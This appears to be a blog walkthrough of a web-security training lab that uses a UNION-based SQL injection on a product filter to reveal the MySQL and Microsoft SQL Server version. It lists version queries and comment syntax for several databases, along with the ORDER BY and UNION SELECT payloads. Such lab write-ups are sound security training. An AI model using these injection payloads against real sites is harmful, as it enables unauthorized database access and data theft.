LAB 8 : Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft

Problem Statement :

This lab contains an SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.

To solve the lab, display the database version string.


Make the database retrieve the string: ‘8.0.31-0ubuntu0.20.04.2’

Understanding: Different Database Syntax

Database versions:

You can query the database to determine its type and version. This information is useful when formulating more complicated attacks.

OracleSELECT banner FROM v$version SELECT version FROM v$instance
MicrosoftSELECT @@version
PostgreSQLSELECT version()
MySQLSELECT @@version


You can use comments to truncate a query and remove the portion of the original query that follows your input.

Microsoft–comment /*comment*/
PostgreSQL–comment /*comment*/
MySQL#comment — comment [Note the space after the double dash] /*comment*/

Steps to resolve this lab :

Note :

  • To solve this LB in the browser it self, we have to Encode the # char here. Else browser will escape this char.
  • In mysql we can comment using multiple methods like –, # or /* */
  1. First find out how many columns are there. Using ORDER by Clause.

Crafting the URL –

We are using # char to comment.

Note : Browser will escape # char so we encode it with %23

At the end of the URL type

  1. ‘ ORDER By 1 %23
  2. ‘ ORDER. By 2 %23

This will show us number of columns we have in this.

  1. Next is to craft the payload to get the version.

‘ UNION SELECT NULL, @@version %23

This is how it looks in Database end

  1. MYSQL
  1. Same command works on Microsoft SQL Server as well.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s